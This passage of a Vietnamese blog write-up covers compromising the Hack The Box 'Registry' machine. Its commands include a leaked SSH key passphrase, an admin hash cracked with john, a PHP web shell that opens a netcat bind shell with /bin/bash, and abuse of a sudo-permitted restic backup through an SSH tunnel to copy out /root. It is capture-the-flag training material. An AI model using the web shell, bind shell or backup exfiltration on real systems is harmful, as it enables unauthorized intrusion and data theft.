Status: Image is up to date <span style="color:#66d9ef">for</span> docker.registry.htb/bolt-image:latest
docker.registry.htb/bolt-image:latest
</code></pre></div><p>Pull về xong rồi thì chui vào thôi</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-bash" data-lang="bash">➜  ~ docker run --rm -it docker.registry.htb/bolt-image:latest
root@9818304f783b:/# 
</code></pre></div><p>Kinh nghiệm của mình là cứ tập trung vào những folder nào nó cực kỳ nhạy cảm như <code>ssh</code>, rồi mấy thư mục <code>user</code>, <code>/var/www/html</code> xem có gì không.
Lục mãi thì trong thư mục <code>/root/.ssh</code> có file private key ssh. Mừng huýnh rồi sử dụng <code>ssh2john.py</code> và <code>john</code> brute force lấy pass private key nhưng mà k được. Nên mình quay lại docker xem bên trong còn gì nữa không.
Sau một hồi tìm kiếm lùng sục thì mình thấy có 1 file này ở đây.</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-bash" data-lang="bash">root@9818304f783b:/etc/profile.d# cat 01-ssh.sh 
<span style="color:#75715e">#!/usr/bin/expect -f</span>
<span style="color:#75715e">#eval `ssh-agent -s`</span>
spawn ssh-add /root/.ssh/id_rsa
expect <span style="color:#e6db74">&#34;Enter passphrase for /root/.ssh/id_rsa:&#34;</span>
send <span style="color:#e6db74">&#34;GkOcz221Ftb3ugog\n&#34;</span>;
expect <span style="color:#e6db74">&#34;Identity added: /root/.ssh/id_rsa (/root/.ssh/id_rsa)&#34;</span>
interact
</code></pre></div><p>Vậy đây là đoạn chương trình tạo khóa private key. Mật khẩu file <code>id_rsa</code> kia là <code>GkOcz221Ftb3ugog</code>.
Việc còn lại là mình ssh vào machine thôi.</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-bash" data-lang="bash">➜  registry ssh -i id_rsa root@10.10.10.159      
Enter passphrase <span style="color:#66d9ef">for</span> key <span style="color:#e6db74">&#39;id_rsa&#39;</span>: 
root@10.10.10.159<span style="color:#960050;background-color:#1e0010">&#39;</span>s password: 
</code></pre></div><p>K được. Cơ mà mình hơi ngây thơ, ssh vào <code>root</code> thì bài này đã dễ quá =)). Xong mình nhìn lại cái tên image docker là <code>bolt-image</code>. Thử sử dụng user ssh là <code>bolt</code> xem sao.</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-bash" data-lang="bash">➜  registry ssh -i id_rsa bolt@10.10.10.159
Enter passphrase <span style="color:#66d9ef">for</span> key <span style="color:#e6db74">&#39;id_rsa&#39;</span>:
Welcome to Ubuntu 18.04.3 LTS <span style="color:#f92672">(</span>GNU/Linux 4.15.0-65-generic x86_64<span style="color:#f92672">)</span>

  System information as of Mon Feb <span style="color:#ae81ff">10</span> 09:35:17 UTC <span style="color:#ae81ff">2020</span>

  System load:  0.0               Users logged in:                <span style="color:#ae81ff">1</span>
  Usage of /:   5.7% of 61.80GB   IP address <span style="color:#66d9ef">for</span> eth0:            10.10.10.159
  Memory usage: 32%               IP address <span style="color:#66d9ef">for</span> br-1bad9bd75d17: 172.18.0.1
  Swap usage:   0%                IP address <span style="color:#66d9ef">for</span> docker0:         172.17.0.1
  Processes:    <span style="color:#ae81ff">173</span>
Last login: Mon Feb <span style="color:#ae81ff">10</span> 09:06:21 <span style="color:#ae81ff">2020</span> from 10.10.16.7
bolt@bolt:~$ 
user.txt
</code></pre></div><p>cat user.txt và submit lên thôi :v</p>
<h2 id="lấy-cờ-root">Lấy cờ Root<a hidden class="anchor" aria-hidden="true" href="#lấy-cờ-root">#</a></h2>
<p>Mình sử dụng private key để đăng nhập vào ssh của <code>bolt</code> nên mình chưa thể sử dụng sudo right để leo thang đặc quyền được vì khi gõ <code>sudo -l</code> hệ thống sẽ yêu cầu nhập mật khẩu của <code>bolt</code>.
Mình đã sử dụng <a href="https://github.com/rebootuser/LinEnum/blob/master/LinEnum.sh">LinEnum.sh</a> để khai thác ở user <code>bolt</code> này nhưng chưa thu được kết quả gì. Thử đủ loại exploit mà k lên được root. Điều khiến cho mình tập trung tiếp là vào phần web.
Mình tìm thấy được trong thư mục web có thư mục <code>/bolt</code> thì mình thử vào xem sao.
<img loading="lazy" src="/img/MinhTuan-2020-02-10-16-49-44-1895x851.png" alt=""  />
</p>
<p>Trang này được tạo bởi <a href="https://docs.bolt.cm/3.7/getting-started/introduction">Bolt CMS</a>, là 1 opensource. Mình đọc trên doc thì thấy chỗ login <a href="https://docs.bolt.cm/3.7/manual/login">https://docs.bolt.cm/3.7/manual/login</a> là <code>/login</code> nhưng mà thử thì lại bắn ra lỗi <code>404</code>. Xong rồi mình thử lại là <a href="http://registry.htb/bolt/bolt">http://registry.htb/bolt/bolt</a> thì lại vào được trang login (nani, chả hiểu kiểu gì).
Công cuộc tiếp theo thì tìm kiếm account admin đăng nhập vào đây thôi.
Lục tiếp trong folder <code>/var/www/html/bolt</code> thì có 1 file db</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-bash" data-lang="bash">bolt@bolt:/var/www/html/bolt/app/database$ ls
bolt.db
bolt@bolt:/var/www/html/bolt/app/database$ file bolt.db 
bolt.db: SQLite 3.x database, last written using SQLite version <span style="color:#ae81ff">3022000</span>
</code></pre></div><p>Check file thì đây là 1 file db SQLite 3. Tiếc là trên machine lại k có sqlite3 nên mình copy file này về máy để kiểm tra.
Sử dụng <code>scp</code> để copy file <code>bolt.db</code> về máy mình</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-bash" data-lang="bash">➜  registry scp -i id_rsa bolt@10.10.10.159:/var/www/html/bolt/app/database/bolt.db .
</code></pre></div><p>Sau khi đã copy xong file thì mình chui vào xem trong đó có gì, mình tìm thấy tài khoản admin ở trong bảng <code>bolt_users</code></p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-bash" data-lang="bash">➜  registry sqlite3 bolt.db
SQLite version 3.31.0 2019-12-29 00:52:41
Enter <span style="color:#e6db74">&#34;.help&#34;</span> <span style="color:#66d9ef">for</span> usage hints.
sqlite&gt; .table
bolt_authtoken    bolt_field_value  bolt_pages        bolt_users      
bolt_blocks       bolt_homepage     bolt_relations  
bolt_cron         bolt_log_change   bolt_showcases  
bolt_entries      bolt_log_system   bolt_taxonomy   
sqlite&gt; <span style="color:#66d9ef">select</span> * from bolt_users 
   ...&gt; ;
1|admin|$2y$10$e.ChUytg9SrL7AsboF2bX.wWKQ1LkS5Fi3/Z0yYD86.P5E9cpY7PK|bolt@registry.htb|2020-02-09 23:27:11|10.10.15.117|Admin|<span style="color:#f92672">[</span><span style="color:#e6db74">&#34;themes://basic.php&#34;</span>,<span style="color:#e6db74">&#34;themes://rev.php&#34;</span>,<span style="color:#e6db74">&#34;themes://base-2018/meh.twig&#34;</span>,<span style="color:#e6db74">&#34;themes://meh.twig&#34;</span>,<span style="color:#e6db74">&#34;themes://shell.php&#34;</span><span style="color:#f92672">]</span>|1<span style="color:#f92672">||||</span>0<span style="color:#f92672">||[</span><span style="color:#e6db74">&#34;root&#34;</span>,<span style="color:#e6db74">&#34;everyone&#34;</span><span style="color:#f92672">]</span>
sqlite&gt; 
</code></pre></div><p>Sử dụng <code>john</code> để crack passwd admin ra được passwd là <code>strawberry</code>, đăng nhập vào <a href="http://registry.htb/bolt/bolt">http://registry.htb/bolt/bolt</a>
Ở đây có 1 trình upload file, ta thử upload file shell lên đây nhưng mà nó k cho upload file php lên.
<img loading="lazy" src="/img/MinhTuan-2020-02-10-17-54-08-1157x328.png" alt=""  />

Ta sửa 1 chút config ở đây để server cho phép upload file php
<img loading="lazy" src="/img/MinhTuan-2020-02-10-17-52-48-1858x882.png" alt=""  />

<img loading="lazy" src="/img/MinhTuan-2020-02-10-17-56-09-721x419.png" alt=""  />

Sau đấy ta lưu lại rồi chuyển sang chức năng upload đẩy shell lên.
Ban đầu mình sử dụng <a href="https://github.com/flozz/p0wny-shell">https://github.com/flozz/p0wny-shell</a> nhưng mà mình k thể reverse shell lại máy mình được, dường như là ở đây cấu hình firewall chặn kết nối ra ngoài. Viết đủ thể loại shell php upload lên nhưng mà k được, nên mình nghĩ đến là sử dụng máy mình reverse shell lên máy chủ.
Sử dụng file <code>shell.php</code>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-php" data-lang="php"><span style="color:#f92672">&lt;?</span><span style="color:#a6e22e">php</span> <span style="color:#a6e22e">system</span>(<span style="color:#e6db74">&#34;nc.traditional -lvp 4444 -e /bin/bash&#34;</span>);
</code></pre></div></p>
<p>Upload lên rồi bên máy mình sử dụng lệnh</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-bash" data-lang="bash">➜  registry nc -nv 10.10.10.159 <span style="color:#ae81ff">4444</span>
<span style="color:#f92672">(</span>UNKNOWN<span style="color:#f92672">)</span> <span style="color:#f92672">[</span>10.10.10.159<span style="color:#f92672">]</span> <span style="color:#ae81ff">4444</span> <span style="color:#f92672">(</span>?<span style="color:#f92672">)</span> open
</code></pre></div><p>Upgrade shell</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-bash" data-lang="bash">python -c <span style="color:#e6db74">&#39;import pty; pty.spawn(&#34;/bin/bash&#34;)&#39;</span>
</code></pre></div><p>Đến đây rồi lại tiếp tục sử dụng <a href="https://github.com/rebootuser/LinEnum/blob/master/LinEnum.sh">LinEnum.sh</a> để kiểm tra xem có gì không thì mình thấy cái này</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-bash" data-lang="bash"><span style="color:#f92672">[</span>+<span style="color:#f92672">]</span> We can sudo without supplying a password!
Matching Defaults entries <span style="color:#66d9ef">for</span> www-data on bolt:
    env_reset, exempt_group<span style="color:#f92672">=</span>sudo, mail_badpass, secure_path<span style="color:#f92672">=</span>/usr/local/sbin<span style="color:#ae81ff">\:</span>/usr/local/bin<span style="color:#ae81ff">\:</span>/usr/sbin<span style="color:#ae81ff">\:</span>/usr/bin<span style="color:#ae81ff">\:</span>/sbin<span style="color:#ae81ff">\:</span>/bin<span style="color:#ae81ff">\:</span>/snap/bin

User www-data may run the following commands on bolt:
    <span style="color:#f92672">(</span>root<span style="color:#f92672">)</span> NOPASSWD: /usr/bin/restic backup -r rest*
</code></pre></div><p>Tập trung hết cơm gạo vào phần này để lấy root =)).</p>
<p>Giới thiệu sơ qua một chút, <code>restic</code> là 1 opensource sử dụng để backup, nói rõ hơn thì mình cũng chịu vì cái này quá mới so với mình =)), chả biết gì cả.</p>
<p>Ngồi đọc document của nó tại đây <a href="https://restic.readthedocs.io/en/latest/">https://restic.readthedocs.io/en/latest/</a>
Sau một khoảng thời gian đọc doc với lên mạng tìm exam câu lệnh của nó thì mới biết là nó cần 1 server để backup. Người bạn chơi cùng mình bảo là nó có 1 <code>restic server</code>, nó tự động chạy trên cổng 8000. Mình ngồi tải file binary của nó ở đây <a href="https://github.com/restic/rest-server/releases">https://github.com/restic/rest-server/releases</a></p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-bash" data-lang="bash">➜  Downloads ./rest-server-0.9.7-linux-amd64 
rest-server 0.9.7 compiled with go1.10 on linux/amd64
Data directory: /tmp/restic
Authentication disabled
Private repositories disabled
Starting server on :8000
</code></pre></div><p>Chạy server xong thì tạo repo restic để lưu file backup</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-bash" data-lang="bash">➜  Downloads apt-get install restic 
➜  Downloads restic init -r /tmp/restic
enter password <span style="color:#66d9ef">for</span> new repository: 
enter password again: 
created restic repository 03ab053496 at /tmp/restic

Please note that knowledge of your password is required to access
the repository. Losing your password means that your data is
irrecoverably lost.
</code></pre></div><p>Điều cần làm bây giờ là ánh xạ cổng <code>8000</code> từ máy mình lên machine cũng trên cổng <code>8000</code> luôn cho nhanh (thực ra cho dễ nhớ =))).
Sử dụng ssh ánh xạ qua user <code>bolt</code>. À mà ban đầu mình dùng www-data nhưng mà chả hiểu ánh xạ lên kiểu gì, biết mỗi ánh xạ qua ssh thì dùng qua thằng bolt luôn. Nhưng chẳng hiểu kiểu gì thằng www-data cũng xài được luôn. Nghĩ ngẫm 1 hồi hóa ra là nó chạy trên quyền root cái lệnh restic =)).</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-bash" data-lang="bash">➜  registry ssh -i id_rsa -R 8000:127.0.0.1:8000 bolt@10.10.10.159
</code></pre></div><p>Sử dụng <code>restic</code> với quyền sudo backup thư mục <code>/root</code></p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-bash" data-lang="bash">www-data@bolt:~/html$ sudo /usr/bin/restic backup -r rest:http://127.0.0.1:8000 /root
&lt;n/restic backup -r rest:http://127.0.0.1:8000 /root
enter password <span style="color:#66d9ef">for</span> repository: <span style="color:#ae81ff">123123</span>

password is correct
found <span style="color:#ae81ff">2</span> old cache directories in /var/www/.cache/restic, pass --cleanup-cache to remove them
scan <span style="color:#f92672">[</span>/root<span style="color:#f92672">]</span>
scanned <span style="color:#ae81ff">10</span> directories, <span style="color:#ae81ff">14</span> files in 0:00
<span style="color:#f92672">[</span>0:01<span style="color:#f92672">]</span> 100.00%  28.066 KiB / 28.066 KiB  <span style="color:#ae81ff">24</span> / <span style="color:#ae81ff">24</span> items  <span style="color:#ae81ff">0</span> errors  ETA 0:00 
duration: 0:01
snapshot e5ef88b3 saved
www-data@bolt:~/html$ 
</code></pre></div><p>Ngon, lưu snapshot được về máy mình rồi, điều quan trọng giờ là tìm lệnh để đọc nó ra thôi.
Ngồi cat mấy cái folder trong <code>/tmp/restic</code> mà nó mã hóa hết luôn, nhìn như kiểu blockchain =)), sợ vl. Ngồi đọc doc thấy đoạn này, hóa ra là nó dùng restore chứ nó đếch đọc được kiểu bt =)).</p>
<p><img loading="lazy" src="/img/MinhTuan-2020-02-10-18-26-44-777x267.png" alt=""  />
</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-bash" data-lang="bash">➜  restic restic -r /tmp/restic restore e5ef88b3 --target /tmp/restic-root 
enter password <span style="color:#66d9ef">for</span> repository: 
repository 03ab0534 opened successfully, password is correct
restoring &lt;Snapshot e5ef88b3 of <span style="color:#f92672">[</span>/root<span style="color:#f92672">]</span> at 2020-02-10 06:26:17.454661805 +0000 UTC by root@bolt&gt; to /tmp/restic-root
</code></pre></div><p>Xong rồi, vào <code>/tmp/restic-root</code> mà đọc cờ cuối thôi ;))</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-bash" data-lang="bash">➜  restic cd /tmp/restic-root 
➜  restic-root ;s
zsh: command not found: s
➜  restic-root ls
root
➜  restic-root cd root            
➜  root ls
config.yml  cron.sh  root.txt
</code></pre></div><h2 id="funfact">Funfact<a hidden class="anchor" aria-hidden="true" href="#funfact">#</a></h2>
<ul>
<li>Cay 1</li>
</ul>
<p><img loading="lazy" src="/img/MinhTuan-2020-02-10-18-32-35-672x282.png" alt=""  />
</p>
<ul>
<li>Cay 2: Thề luôn chả biết cái gì thằng restic, khai thác machine này khá khó đối với mình.</li>
<li>Cay 3: Đang suy nghĩ nhưng khá là cay.</li>
</ul>
<h2 id="thanks">Thanks<a hidden class="anchor" aria-hidden="true" href="#thanks">#</a></h2>
<ul>
<li>Nguyen Van Khanh B</li>
<li>Nguyen Xuan Hoa</li>
</ul>

</div>
  <footer class="post-footer">
    <nav class="paginav">
      <a class="prev" href="https://minhtuanact.github.io/post/reflected-xss-in-atutor-2.2.4/">
        <span class="title">« Prev Page</span>
        <br>
        <span>Reflected XSS in ATutor 2.2.4</span>
      </a>
      <a class="next" href="https://minhtuanact.github.io/post/writeup-whitehat-2020/">
        <span class="title">Next Page »</span>
        <br>
        <span>[Writeup] Whitehat Grand Prix 06 - 2020</span>
      </a>
    </nav>



<div class="share-buttons">
    <a target="_blank" rel="noopener noreferrer" aria-label="share Writeup Htb Registry on twitter"
        href="https://twitter.com/intent/tweet/?text=Writeup%20Htb%20Registry&amp;url=https%3a%2f%2fminhtuanact.github.io%2fpost%2fwriteup-htb-registry%2f&amp;hashtags=">
        <svg version="1.1" viewBox="0 0 512 512" xml:space="preserve">
            <path
                d="M449.446,0c34.525,0 62.554,28.03 62.554,62.554l0,386.892c0,34.524 -28.03,62.554 -62.554,62.554l-386.892,0c-34.524,0 -62.554,-28.03 -62.554,-62.554l0,-386.892c0,-34.524 28.029,-62.554 62.554,-62.554l386.892,0Zm-253.927,424.544c135.939,0 210.268,-112.643 210.268,-210.268c0,-3.218 0,-6.437 -0.153,-9.502c14.406,-10.421 26.973,-23.448 36.935,-38.314c-13.18,5.824 -27.433,9.809 -42.452,11.648c15.326,-9.196 26.973,-23.602 32.49,-40.92c-14.252,8.429 -30.038,14.56 -46.896,17.931c-13.487,-14.406 -32.644,-23.295 -53.946,-23.295c-40.767,0 -73.87,33.104 -73.87,73.87c0,5.824 0.613,11.494 1.992,16.858c-61.456,-3.065 -115.862,-32.49 -152.337,-77.241c-6.284,10.881 -9.962,23.601 -9.962,37.088c0,25.594 13.027,48.276 32.95,61.456c-12.107,-0.307 -23.448,-3.678 -33.41,-9.196l0,0.92c0,35.862 25.441,65.594 59.311,72.49c-6.13,1.686 -12.72,2.606 -19.464,2.606c-4.751,0 -9.348,-0.46 -13.946,-1.38c9.349,29.426 36.628,50.728 68.965,51.341c-25.287,19.771 -57.164,31.571 -91.8,31.571c-5.977,0 -11.801,-0.306 -17.625,-1.073c32.337,21.15 71.264,33.41 112.95,33.41Z" />
        </svg>
    </a>
    <a target="_blank" rel="noopener noreferrer" aria-label="share Writeup Htb Registry on linkedin"
        href="https://www.linkedin.com/shareArticle?mini=true&amp;url=https%3a%2f%2fminhtuanact.github.io%2fpost%2fwriteup-htb-registry%2f&amp;title=Writeup%20Htb%20Registry&amp;summary=Writeup%20Htb%20Registry&amp;source=https%3a%2f%2fminhtuanact.github.io%2fpost%2fwriteup-htb-registry%2f">
        <svg version="1.1" viewBox="0 0 512 512" xml:space="preserve">
            <path
                d="M449.446,0c34.525,0 62.554,28.03 62.554,62.554l0,386.892c0,34.524 -28.03,62.554 -62.554,62.554l-386.892,0c-34.524,0 -62.554,-28.03 -62.554,-62.554l0,-386.892c0,-34.524 28.029,-62.554 62.554,-62.554l386.892,0Zm-288.985,423.278l0,-225.717l-75.04,0l0,225.717l75.04,0Zm270.539,0l0,-129.439c0,-69.333 -37.018,-101.586 -86.381,-101.586c-39.804,0 -57.634,21.891 -67.617,37.266l0,-31.958l-75.021,0c0.995,21.181 0,225.717 0,225.717l75.02,0l0,-126.056c0,-6.748 0.486,-13.492 2.474,-18.315c5.414,-13.475 17.767,-27.434 38.494,-27.434c27.135,0 38.007,20.707 38.007,51.037l0,120.768l75.024,0Zm-307.552,-334.556c-25.674,0 -42.448,16.879 -42.448,39.002c0,21.658 16.264,39.002 41.455,39.002l0.484,0c26.165,0 42.452,-17.344 42.452,-39.002c-0.485,-22.092 -16.241,-38.954 -41.943,-39.002Z" />
        </svg>
    </a>
    <a target="_blank" rel="noopener noreferrer" aria-label="share Writeup Htb Registry on reddit"
        href="https://reddit.com/submit?url=https%3a%2f%2fminhtuanact.github.io%2fpost%2fwriteup-htb-registry%2f&title=Writeup%20Htb%20Registry">
        <svg version="1.1" viewBox="0 0 512 512" xml:space="preserve">
            <path
                d="M449.446,0c34.525,0 62.554,28.03 62.554,62.554l0,386.892c0,34.524 -28.03,62.554 -62.554,62.554l-386.892,0c-34.524,0 -62.554,-28.03 -62.554,-62.554l0,-386.892c0,-34.524 28.029,-62.554 62.554,-62.554l386.892,0Zm-3.446,265.638c0,-22.964 -18.616,-41.58 -41.58,-41.58c-11.211,0 -21.361,4.457 -28.841,11.666c-28.424,-20.508 -67.586,-33.757 -111.204,-35.278l18.941,-89.121l61.884,13.157c0.756,15.734 13.642,28.29 29.56,28.29c16.407,0 29.706,-13.299 29.706,-29.701c0,-16.403 -13.299,-29.702 -29.706,-29.702c-11.666,0 -21.657,6.792 -26.515,16.578l-69.105,-14.69c-1.922,-0.418 -3.939,-0.042 -5.585,1.036c-1.658,1.073 -2.811,2.761 -3.224,4.686l-21.152,99.438c-44.258,1.228 -84.046,14.494 -112.837,35.232c-7.468,-7.164 -17.589,-11.591 -28.757,-11.591c-22.965,0 -41.585,18.616 -41.585,41.58c0,16.896 10.095,31.41 24.568,37.918c-0.639,4.135 -0.99,8.328 -0.99,12.576c0,63.977 74.469,115.836 166.33,115.836c91.861,0 166.334,-51.859 166.334,-115.836c0,-4.218 -0.347,-8.387 -0.977,-12.493c14.564,-6.47 24.735,-21.034 24.735,-38.001Zm-119.474,108.193c-20.27,20.241 -59.115,21.816 -70.534,21.816c-11.428,0 -50.277,-1.575 -70.522,-21.82c-3.007,-3.008 -3.007,-7.882 0,-10.889c3.003,-2.999 7.882,-3.003 10.885,0c12.777,12.781 40.11,17.317 59.637,17.317c19.522,0 46.86,-4.536 59.657,-17.321c3.016,-2.999 7.886,-2.995 10.885,0.008c3.008,3.011 3.003,7.882 -0.008,10.889Zm-5.23,-48.781c-16.373,0 -29.701,-13.324 -29.701,-29.698c0,-16.381 13.328,-29.714 29.701,-29.714c16.378,0 29.706,13.333 29.706,29.714c0,16.374 -13.328,29.698 -29.706,29.698Zm-160.386,-29.702c0,-16.381 13.328,-29.71 29.714,-29.71c16.369,0 29.689,13.329 29.689,29.71c0,16.373 -13.32,29.693 -29.689,29.693c-16.386,0 -29.714,-13.32 -29.714,-29.693Z" />
        </svg>
    </a>
    <a target="_blank" rel="noopener noreferrer" aria-label="share Writeup Htb Registry on facebook"
        href="https://facebook.com/sharer/sharer.php?u=https%3a%2f%2fminhtuanact.github.io%2fpost%2fwriteup-htb-registry%2f">
        <svg version="1.1" viewBox="0 0 512 512" xml:space="preserve">
            <path
                d="M449.446,0c34.525,0 62.554,28.03 62.554,62.554l0,386.892c0,34.524 -28.03,62.554 -62.554,62.554l-106.468,0l0,-192.915l66.6,0l12.672,-82.621l-79.272,0l0,-53.617c0,-22.603 11.073,-44.636 46.58,-44.636l36.042,0l0,-70.34c0,0 -32.71,-5.582 -63.982,-5.582c-65.288,0 -107.96,39.569 -107.96,111.204l0,62.971l-72.573,0l0,82.621l72.573,0l0,192.915l-191.104,0c-34.524,0 -62.554,-28.03 -62.554,-62.554l0,-386.892c0,-34.524 28.029,-62.554 62.554,-62.554l386.892,0Z" />
        </svg>
    </a>
    <a target="_blank" rel="noopener noreferrer" aria-label="share Writeup Htb Registry on whatsapp"
        href="https://api.whatsapp.com/send?text=Writeup%20Htb%20Registry%20-%20https%3a%2f%2fminhtuanact.github.io%2fpost%2fwriteup-htb-registry%2f">
        <svg version="1.1" viewBox="0 0 512 512" xml:space="preserve">
            <path
                d="M449.446,0c34.525,0 62.554,28.03 62.554,62.554l0,386.892c0,34.524 -28.03,62.554 -62.554,62.554l-386.892,0c-34.524,0 -62.554,-28.03 -62.554,-62.554l0,-386.892c0,-34.524 28.029,-62.554 62.554,-62.554l386.892,0Zm-58.673,127.703c-33.842,-33.881 -78.847,-52.548 -126.798,-52.568c-98.799,0 -179.21,80.405 -179.249,179.234c-0.013,31.593 8.241,62.428 23.927,89.612l-25.429,92.884l95.021,-24.925c26.181,14.28 55.659,21.807 85.658,21.816l0.074,0c98.789,0 179.206,-80.413 179.247,-179.243c0.018,-47.895 -18.61,-92.93 -52.451,-126.81Zm-126.797,275.782l-0.06,0c-26.734,-0.01 -52.954,-7.193 -75.828,-20.767l-5.441,-3.229l-56.386,14.792l15.05,-54.977l-3.542,-5.637c-14.913,-23.72 -22.791,-51.136 -22.779,-79.287c0.033,-82.142 66.867,-148.971 149.046,-148.971c39.793,0.014 77.199,15.531 105.329,43.692c28.128,28.16 43.609,65.592 43.594,105.4c-0.034,82.149 -66.866,148.983 -148.983,148.984Zm81.721,-111.581c-4.479,-2.242 -26.499,-13.075 -30.604,-14.571c-4.105,-1.495 -7.091,-2.241 -10.077,2.241c-2.986,4.483 -11.569,14.572 -14.182,17.562c-2.612,2.988 -5.225,3.364 -9.703,1.12c-4.479,-2.241 -18.91,-6.97 -36.017,-22.23c-13.314,-11.876 -22.304,-26.542 -24.916,-31.026c-2.612,-4.484 -0.279,-6.908 1.963,-9.14c2.016,-2.007 4.48,-5.232 6.719,-7.847c2.24,-2.615 2.986,-4.484 4.479,-7.472c1.493,-2.99 0.747,-5.604 -0.374,-7.846c-1.119,-2.241 -10.077,-24.288 -13.809,-33.256c-3.635,-8.733 -7.327,-7.55 -10.077,-7.688c-2.609,-0.13 -5.598,-0.158 -8.583,-0.158c-2.986,0 -7.839,1.121 -11.944,5.604c-4.105,4.484 -15.675,15.32 -15.675,37.364c0,22.046 16.048,43.342 18.287,46.332c2.24,2.99 31.582,48.227 76.511,67.627c10.685,4.615 19.028,7.371 25.533,9.434c10.728,3.41 20.492,2.929 28.209,1.775c8.605,-1.285 26.499,-10.833 30.231,-21.295c3.732,-10.464 3.732,-19.431 2.612,-21.298c-1.119,-1.869 -4.105,-2.99 -8.583,-5.232Z" />
        </svg>
    </a>
    <a target="_blank" rel="noopener noreferrer" aria-label="share Writeup Htb Registry on telegram"
        href="https://telegram.me/share/url?text=Writeup%20Htb%20Registry&amp;url=https%3a%2f%2fminhtuanact.github.io%2fpost%2fwriteup-htb-registry%2f">
        <svg version="1.1" xml:space="preserve" viewBox="2 2 28 28">
            <path
                d="M26.49,29.86H5.5a3.37,3.37,0,0,1-2.47-1,3.35,3.35,0,0,1-1-2.47V5.48A3.36,3.36,0,0,1,3,3,3.37,3.37,0,0,1,5.5,2h21A3.38,3.38,0,0,1,29,3a3.36,3.36,0,0,1,1,2.46V26.37a3.35,3.35,0,0,1-1,2.47A3.38,3.38,0,0,1,26.49,29.86Zm-5.38-6.71a.79.79,0,0,0,.85-.66L24.73,9.24a.55.55,0,0,0-.18-.46.62.62,0,0,0-.41-.17q-.08,0-16.53,6.11a.59.59,0,0,0-.41.59.57.57,0,0,0,.43.52l4,1.24,1.61,4.83a.62.62,0,0,0,.63.43.56.56,0,0,0,.4-.17L16.54,20l4.09,3A.9.9,0,0,0,21.11,23.15ZM13.8,20.71l-1.21-4q8.72-5.55,8.78-5.55c.15,0,.23,0,.23.16a.18.18,0,0,1,0,.06s-2.51,2.3-7.52,6.8Z" />
        </svg>
    </a>
</div>

  </footer>
</article>
    </main><footer class="footer">
    <span>&copy; 2021 <a href="https://minhtuanact.github.io/">minhtuanact | Blog</a></span>
    <span>&middot;</span>
    <span>Powered by <a href="https://gohugo.io/" rel="noopener noreferrer" target="_blank">Hugo</a></span>
    <span>&middot;</span>
    <span>Theme <a href="https://git.io/hugopapermod" rel="noopener" target="_blank">PaperMod</a></span>
</footer>
<a href="#top" aria-label="go to top" title="Go to Top (Alt + G)">
    <button class="top-link" id="top-link" type="button" accesskey="g">
        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 12 6" fill="currentColor">
            <path d="M12 6H0l6-6z" />
        </svg>
    </button>
</a>



<script defer src="/assets/js/highlight.min.7680afc38aa6b15ddf158a4f3780b7b1f7dde7e91d26f073e6229bb7a0793c92.js" integrity="sha256-doCvw4qmsV3fFYpPN4C3sffd5&#43;kdJvBz5iKbt6B5PJI="
    onload="hljs.initHighlightingOnLoad();"></script>
<script>
    window.onload = function () {
        if (localStorage.getItem("menu-scroll-position")) {
            document.getElementById('menu').scrollLeft = localStorage.getItem("menu-scroll-position");
        }
    }

    function menu_on_scroll() {
        localStorage.setItem("menu-scroll-position", document.getElementById('menu').scrollLeft);
    }

    document.querySelectorAll('a[href^="#"]').forEach(anchor => {
        anchor.addEventListener("click", function (e) {
            e.preventDefault();
            var id = this.getAttribute("href").substr(1);
            if (!window.matchMedia('(prefers-reduced-motion: reduce)').matches) {
                document.querySelector(`[id='${decodeURIComponent(id)}']`).scrollIntoView({
                    behavior: "smooth"
                });
            } else {
                document.querySelector(`[id='${decodeURIComponent(id)}']`).scrollIntoView();
            }
            if (id === "top") {
                history.replaceState(null, null, " ");
            } else {
                history.pushState(null, null, `#${id}`);
            }
        });
    });

</script>
<script>
    var mybutton = document.getElementById("top-link");
    window.onscroll = function () {
        if (document.body.scrollTop > 800 || document.documentElement.scrollTop > 800) {
            mybutton.style.visibility = "visible";
            mybutton.style.opacity = "1";
        } else {
            mybutton.style.visibility = "hidden";
            mybutton.style.opacity = "0";
        }
    };

</script>
<script>
    document.getElementById("theme-toggle").addEventListener("click", () => {
        if (document.body.className.includes("dark")) {
            document.body.classList.remove('dark');
            localStorage.setItem("pref-theme", 'light');
        } else {
            document.body.classList.add('dark');
            localStorage.setItem("pref-theme", 'dark');
        }
    })

</script>

</body>

</html>
